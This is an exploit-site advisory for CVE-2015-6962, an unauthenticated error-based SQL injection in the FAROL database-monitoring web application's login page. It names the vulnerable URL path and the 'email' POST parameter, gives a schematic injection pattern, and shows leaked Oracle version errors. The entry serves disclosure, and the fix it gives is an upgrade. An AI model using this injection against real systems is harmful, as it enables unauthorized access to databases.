FAROL - SQL Injection Vulnerability

ID 1337DAY-ID-24258
Type zdt
Reporter Thierry Fernandes Faria
Modified 2015-09-16T00:00:00


Exploit for php platform in category web applications

                                            # Exploit Title: Web Application Farol with anauthenticated SQLi injection
# Date: 2015-09-16
# Exploit Author: Thierry Fernandes Faria [ a.k.a SoiL ] [ thierryfariaa (at) gmail (dot) com ]
# Vendor Homepage:http://www.teiko.com.br/pt/solucoes/infraestrutura-em-ti/farol
# Version: [All]
# CVE : CVE-2015-6962
# OWASP Top10: A1-Injection
+ Product Description +
The FAROL web application is a software that monitors the databases
+ Exploitation Details +
A vulnerability has been detected in the login page from  web application FAROL . Sql injection anauthenticated.
The e-mail field at login page is vulnerable.
The e-mail field is vulnerable to Error Based Sql injection.
Vulnerable Page: http://target/tkmonitor/estrutura/login/Login.actions.php?recuperar
Vulnerable POST Parameter: email
Usage:email'[SQLi error based]--
ORA-20000: Oracle Text error:
DRG-11701: thesaurus CORE ProductionNLSRTL Version - ProductionOracle Database 11g Enterprise Edition Release - 64bit ProductionPL/SQL Release - ProductionTNS for Linux: Version - Production does not exist
ORA-06512: at "CTXSYS.DRUE", line 160
+ Solution +
Upgrade the software

#  0day.today [2018-02-09]  #